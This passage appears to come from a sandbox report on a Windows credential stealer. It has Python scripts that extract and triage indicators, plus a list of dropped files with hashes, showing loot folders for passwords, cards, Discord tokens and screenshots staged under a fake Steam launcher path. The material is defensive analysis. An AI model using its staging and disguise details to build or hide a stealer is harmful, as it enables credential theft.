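    return any(dom == s or dom.endswith("." + s) for s in NOISE_SUFFIXES)


def extract_iocs(rows):
    """Group the remaining flows by name (or IP when unresolved) with a tag."""
    iocs = {}
    for row in rows:
        if is_noise(row):
            continue
        key = row["domain"] or row["ip"]
        entry = iocs.setdefault(key, {"ips": set(), "ports": set(), "count": 0, "tag": ""})
        entry["ips"].add(row["ip"])
        entry["ports"].add(row["port"])
        entry["count"] += 1
        if row["domain"]:
            entry["tag"] = SERVICE_TAGS.get(key, "untagged domain; analyst review")
        else:
            entry["tag"] = "unresolved IP; confirm ownership before blocking"
    return iocs


def render(iocs):
    """One line per IOC, busiest first, ready for a ticket or a blocklist."""
    lines = []
    for key, e in sorted(iocs.items(), key=lambda kv: -kv[1]["count"]):
        ips = ",".join(sorted(e["ips"]))
        ports = ",".join(str(p) for p in sorted(e["ports"]))
        lines.append(f"{key:<32} x{e['count']:<3} {ips}:{ports}  {e['tag']}")
    return lines


if __name__ == "__main__":
    print("\n".join(render(extract_iocs(parse_rows(SAMPLE_ROWS)))))
```

The repeated api.ipify.org hits line up with the repeated `curl http://api.ipify.org/` launches in the process tree, which is why the count is kept: a destination contacted once per loop iteration is a better beacon candidate than one seen once. Unresolved IPs stay in the list but are tagged separately, since without a name they cannot be attributed from this report alone.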

Files

memory/896-0-0x00007FFFFCD43000-0x00007FFFFCD45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jeebskcv.gpp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/896-10-0x000001A41EDB0000-0x000001A41EDD2000-memory.dmp

memory/896-9-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

memory/896-11-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

memory/896-12-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

MD5 8eacf3f9be7e3735352c4020fc4e05e9
SHA1 0bb6c048d9e683e152de21f7d368a4c151095504
SHA256 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
SHA512 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0

memory/896-25-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\Executor\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

memory/1008-108-0x0000020CCCD80000-0x0000020CCCDC6000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.cmdline

MD5 84c078e4db612b0dafa3de8198b996c1
SHA1 2361ae986c022878d0ca959887e68a6a14f05705
SHA256 62cab83c1405342619af0c32ffbd051ac370a15f283486994d00724fe2eac531
SHA512 ead7d1cf58530ea65387a71ca6c8aff8ae031544e914b2cde7deb3271ed7f92389fd5054c9c7b80fd3b1e2bce6017d86809211980acc1ce58b10b4bc74969209

\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\CSCF175916096AE4A709A7D4E890657D51.TMP

MD5 3995921343802870743f360b5290b4d3
SHA1 de04cb85bf6f53b45a74dbe80d2646077af3cb12
SHA256 5ebd1ff57d9729443caf371d0f34dce16c6bf5fab37fcb358d269168c0124148
SHA512 7499600eba32de4aa4159c195157387366265e4a279453b3572d9bb7e840045757fc22ccf817228d7accc1c2a79f55571013f9f77489f3ace5db5f580bac79bb

C:\Users\Admin\AppData\Local\Temp\RES8CDE.tmp

MD5 09e347f4faa2a5b4e6a022b95c5f3c59
SHA1 6161f7233fb3add8cd72b5a379affafb549f66e7
SHA256 26b588bc711a7bab1583720fb4a642ed88020dd38c40836f92f1ff531f69b0c1
SHA512 3ca8ba258888da4ac876118d4d3552878ae014e246c4a8c2e02be59bffe54ba7a98297b9006a17883c3bfb458876df31a97adec59fb8097e7a8df416ce045f47

memory/1008-121-0x0000020CCC8F0000-0x0000020CCC8F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.dll

MD5 fd5e45a81ce79a95fc3688599b3e7c28
SHA1 c24801a296a061bd50a56f6263b696c1532dfb77
SHA256 8cf7e867986c516ef5cdd55060da798c49508557a3a01df2843ad52fea0032a2
SHA512 933feb0a1191f75a874f95633fd34b0de154e8571dc495a4c94bad2b2e56238450d0502cbe50af4b6abd847bd9190af541746e9669ab99a0f5a1b7b63cb9c119

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

memory/4584-134-0x000002A357BF0000-0x000002A357C40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6b60063de9d34ef9fcca516b9aa3e024
SHA1 5041e194dd6a879dc811f69c46bb6490d7012f85
SHA256 22166d037fb310b137e38f5a622c0675bd3834ec04743cb9a737cd797990d36b
SHA512 0335951eec844cfa869efbbb15e58c9bbd36c1f26d4859c5f4c2f6878b14ff4dba704f6ae05340eaec4fbb738a10a283d4d5df36a9ffbc9e22ddfc8765917a55

C:\ProgramData\Steam\Launcher\EN-Ngomewng\debug.log

MD5 170569906646d8cc72bf8ab80e606b7e
SHA1 69afd238f8b58c4d637ae4796ed9bdc2a82811d3
SHA256 a30a91f63953a04da97cd2ef6737c068d3375bacd7bfcb62e5e58a8eb8439261
SHA512 97df20770eaf89b312abf961a9f8876bf7338e327cf96eeb0367497b4823428682b019a94c0cacb078523ae805ecf905abea6545664b31428095b7f4dbdf5ef4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ae09b9726ad193e95ef8ec470a3dfafb
SHA1 451e263a3c9fc8011c29ca04a56cc4a632b33efd
SHA256 065a26846f8eb0e69adbafdbb536dfb627f9c739ab011c7f01b07e5db9ff4786
SHA512 fa3443e3f985d37f5774ab8492a13b058c0015d65777d736d52c3239517c53560a6465f0f962aa150c8a6434d0604a8aae095ee129bf20542e468810d9d2a796

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 05ec53e2d2d9867bc93e34e694faec45
SHA1 221d09c47199869538f2b541afa736c03c8d9579
SHA256 ec3ea75321fd8f902276f09b944f01186137b1df0032cd0b19f1cb4772f3c55f
SHA512 a31b105c05b4414c299cfd937757514e293da2772b905a185da21817edf29e6e22c25ad196976a774ba8352550f8d4c1735dbf9a10074e384abfb912e54aa011

\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.cmdline

MD5 ab2678028b4b5acc379ddf06c27edfe2
SHA1 3d5d97b4f1e023ba75e4b53419894de6b6c5481a
SHA256 8dee71b205d053ad7ee1d6fb1d7f6ff7e2c88c6d1834c88faba1ece9e71484a4
SHA512 2b131a281d58374abc44e7450c40da61044092ff9044e7a79ea77bb11ee643167b5b60ddaf5b5b2c49e9c348d7d8c5aee55e79a87721988b45f2d4ecb87bad0f

\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\CSC4E6C8135414A4B0683AD5297B3316BA.TMP

MD5 3d98006292c05aafbc193b92089bb574
SHA1 048af404a72526ef02a2a94a7ccf8cbdb3cf3e01
SHA256 90ab17faca327bb2927b60bd47f769b368debe86569c019d8cf5baf26813997c
SHA512 08f50f4a687ddc5994dba7f666a2f4c11e1dfc3024acca324f31bea5ff4bf29db4f609c3f6746c628b09606189d074b5e409e72dfda87043047372a377323a2c

C:\Users\Admin\AppData\Local\Temp\RES93B4.tmp

MD5 1ca7f72cdd1e421f17024115e07a9f3f
SHA1 5ae2075d60ce3345bc7ba0a99cb18dcc7728fa3d
SHA256 3f138ea24478bc40492f6060b95ebd61de0d4db1cc39fb7e0d6ae424d97e788e
SHA512 76a3873551bb53bbdef43ba3a886eaf8cbcacba6b0f1a21f63f859f06e942666227dec1170732e513c72c50fe25b38768f6e41f55e19c7eafebf7a855fd2d313

C:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.dll

MD5 df35ffc67c8198139c15b37bfb0def7c
SHA1 f64cd45c07d665ac4e6e095903f644a1251ceb80
SHA256 c402621b6d2ed99339b161b4d62c0201c14a96453f45eea3512c5acc06f912f4
SHA512 e7a76f86b6b8b96c02acbfa0c6f3a4c361f238511470b40eebc40d24cf6b8effe2c413a3f8297c2e5cca51f767722b0bbbca5069a386d85823587dcc6f58553f

memory/940-207-0x000001DE02F60000-0x000001DE02F68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cbe5bd1c677a86e505e8afbba76d32d1
SHA1 6781b00d2efbb52232baa535484d0281b2341abc
SHA256 49cc9b9ddec232d1389a770220462e1d940567b9b945da92cfd5d0413d966571
SHA512 aeec87fd93836d8fdd7cf9f7890509f2ea896fe5447fd108bd31f28fc3a19f68c30b585bf8fe02faef8357753036474c7fbe2fa812581efc0a58d5e1c22a64d9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a7f03a7ad1cae046d8ceac04256e5ae
SHA1 ef0bf767c91cba32b33c0b48f74f5eb153ae43d3
SHA256 e8aa3162f519e3670b0fc79dfbeeca68ea2b65a17900cf3aafc6a48de3296d60
SHA512 382a91848be121734bce9f533bcb4747e5f21db5b1ea5dfc8cc567005f5be0f1dcc73a55516b83feb931cdc90601ed4d36fb890687f08e1056ff98da2365f01d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e0266e9b8595afad38e3aeeb7ac9e79
SHA1 d7f76538c8f2b58b6815fe7f4d3038d4d920a45f
SHA256 27bc56e8dd548d29e61b6b8654730b0b30f8d96c7f37ef5c204d4100ee297d43
SHA512 f6e294475d8c96792311bfc8b452a89ca7fb8fdcb127b04e773172f7df0d4e15b30bbd60c9cd6311e442d74a140411c860439afaaa968f05922c73599a0695a4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\ProgramData\Steam\Launcher\EN-Ngomewng\stolen_files.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Serial-Check.txt

MD5 da9ff194886fd99e758d9ca908666e7b
SHA1 6de3fbe2aa5f32663a90576ade7fe2e6de78a7fc
SHA256 0648664f7a0211656e5afa131baa05d5244b86aa762c8a788f9a3b76bd9a6870
SHA512 549d7d0b945ab396e81055e66ddb1d0dafc309e7371c0a62801cc3625da36c9e4e162f3d005491236fbfbdf7df63c3f6bcbf942ec270385c190f1d1ef393f3c0

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Ngomewng\debug.log

MD5 018a4ca87012f367b1d3b8c58ce5a8ed
SHA1 6812ae42fdf463564e060b88a6066ffcb3583102
SHA256 8ee69733b3ad621d5f4a8fff9100b3c8be00092d5efd2e4ced33d16b96a5f21c
SHA512 e418296946b2705acbcdc2dc85658f4a3c1fd2c74d53398b8ffc67625ea77d2bfc02fc305358d6ed04e7fa9222148b562238690fed451866efa8c0ad3cf9c4e7

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\ProgramData\Steam\Launcher\EN-Ngomewng.zip

MD5 0d48a4292c3d48db3ca75697ef99c794
SHA1 42c0f20cf57be70a5c67ab15be81651b65ae35d9
SHA256 565158ce8f4197490dce177667cc3b3b84511cef9bf3eecc68abc0a83be916e2
SHA512 19d5f5e06d9378dd5edee6e1b8de8cc2b7c0f8205a86bd3240da52c9dd16b7727a7aea19657ddf19add237d1e2ac82fbf96966a3d88b260be98aae7e0c1e01b4

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 621419f834750f90083d9b5f3583d7bb
SHA1 32ac4e8c4e775b1cd9c28d4ffead71f347e0dcfb
SHA256 86971f5c7efb01cb04ae067eb8068a6a2d52f9fd3ed3861464953f47e698254e
SHA512 ca9d2042b0bc78ff877f994a1f817c92284ac63951bd15b6164ef6636b6fc42d8d33d51fe5fd8ac7eff5b2f4e39b91a44939f7ea6a44c6ceb79e5adf65a65115

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8baa55f4c9614712ef2edb673b84f197
SHA1 f95f528a8dbff1c7c8abbc320633ad0ec097c902
SHA256 e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3
SHA512 899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

C:\ProgramData\Steam\Launcher\EN-Ngomewng\Screenshots\Screenshot.png

MD5 a49da0880767ed802a3566423a8489f1
SHA1 2775ee90615720b2aa8fd36ab51e5bd279a7b414
SHA256 2eea278706f89c56083822507ede14c541670ee517870e64f6b05f2cded7fdc5
SHA512 4bd4acace6572214b11f0025c6bb62c0907a8cfab206a61f97850051f1cc4ee77da60b4cce15667b21c962081483edc12032c044cf642e9a8d2ed876045526c6

C:\ProgramData\Steam\Launcher\EN-NGO~1\debug.log

MD5 3038dece9944e3cd4243bb2cd7bbf04c
SHA1 87e48836d8776f1df3e229c220215aefaf47ac57
SHA256 228972970c9fe1bb7443a39b7daed7d70601ba61d9717fa66179ba67d1a6f892
SHA512 ff3dd72eba660023a4728a409e09bedf79f0800a40ca474bcec48149596dd64577e9ceddd1242ed2422b058cd5af812136b6556d51f5e2d3b389d1c32508f1a4
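As an added example, not part of the report: a short triage pass over the Files section. It labels each path by what this sample's own listing shows (loot under ProgramData\Steam\Launcher\EN-Ngomewng\, the ZIP that curl uploaded, the ProgramData\edge\Updater scripts, the dropped xylex.exe) and separates out the __PSScriptPolicyTest_*.ps1 and StartupProfileData-NonInteractive files, which PowerShell itself writes on startup and which are not attacker content. One check worth running before trusting a stealer's "stolen_files.zip": the MD5 76cdb2bad9582d23c1f6f4d868218d6c and SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 reported for it are the hashes of a 22-byte ZIP with no entries, so the collection routine found nothing to archive on the sandbox profile, while the outer EN-Ngomewng.zip that was uploaded is not empty. The block computes the empty-archive hashes from the bytes rather than hard-coding them. The sample entries are copied from the listing above; the directory names and labels are assumptions.

```python
import hashlib
import ntpath

# A ZIP with no entries is just the 22-byte end-of-central-directory record.
EMPTY_ZIP = b"PK\x05\x06" + b"\x00" * 18

# Constructed sample: (path, md5, sha256) for entries copied from the Files
# section above; the hashes are the ones the report prints.
SAMPLE_FILES = [
    (r"C:\ProgramData\Steam\Launcher\EN-Ngomewng\stolen_files.zip",
     "76cdb2bad9582d23c1f6f4d868218d6c",
     "8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85"),
    (r"C:\ProgramData\Steam\Launcher\EN-Ngomewng\Passwords\Passwords.txt",
     "c5e74f3120dbbd446a527e785dfe6d66",
     "e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05"),
    (r"C:\ProgramData\Steam\Launcher\EN-Ngomewng\Screenshots\Screenshot.png",
     "a49da0880767ed802a3566423a8489f1",
     "2eea278706f89c56083822507ede14c541670ee517870e64f6b05f2cded7fdc5"),
    (r"C:\ProgramData\Steam\Launcher\EN-Ngomewng.zip",
     "0d48a4292c3d48db3ca75697ef99c794",
     "565158ce8f4197490dce177667cc3b3b84511cef9bf3eecc68abc0a83be916e2"),
    (r"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe",
     "8eacf3f9be7e3735352c4020fc4e05e9",
     "4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e"),
    (r"C:\ProgramData\edge\Updater\RunBatHidden.vbs",
     "14a9867ec0265ebf974e440fcd67d837",
     "cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1"),
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jeebskcv.gpp.ps1",
     "d17fe0a3f47be24a6453e9ef58c94641",
     "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive",
     "5e6baeec02c3d93dce26652e7acebc90",
     "137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0"),
]

# Output directories this sample writes, as seen in the listing (assumed set).
LOOT_DIRS = {"passwords", "cards", "autofills", "discord", "screenshots"}
STAGING = r"c:\programdata\steam\launcher"
STAGE2 = r"c:\programdata\edge\updater"


def empty_zip_hashes():
    """Hashes of the empty archive, computed from the bytes rather than looked up."""
    return {name: hashlib.new(name, EMPTY_ZIP).hexdigest() for name in ("md5", "sha1", "sha256")}


def classify(path, md5, sha256):
    """Label one Files entry; the empty-archive check runs before path heuristics."""
    empty = empty_zip_hashes()
    low = path.lower()
    name = ntpath.basename(low)
    parent = ntpath.basename(ntpath.dirname(low))
    if (md5, sha256) == (empty["md5"], empty["sha256"]):
        return "empty ZIP: collection routine found nothing to take"
    if name.startswith("__psscriptpolicytest_") or name == "startupprofiledata-noninteractive":
        return "PowerShell runtime artefact, not attacker content"
    if low.startswith(STAGING) and name.endswith(".zip"):
        return "exfiltration archive (uploaded with curl)"
    if low.startswith(STAGING) and parent in LOOT_DIRS:
        return f"stolen data: {parent}"
    if low.startswith(STAGE2):
        return "second-stage script dropped for later execution"
    if name.endswith(".exe"):
        return "dropped executable"
    return "unclassified; inspect manually"


def triage(files):
    """Return [(path, label)] in the order given."""
    return [(p, classify(p, m, s)) for p, m, s in files]


if __name__ == "__main__":
    for path, label in triage(SAMPLE_FILES):
        print(f"{label:<55} {path}")
```

The ordering inside `classify` matters: stolen_files.zip sits under the staging directory and ends in .zip, so without the hash check first it would be labelled an exfiltration archive and the analyst would go looking for victim data that was never there.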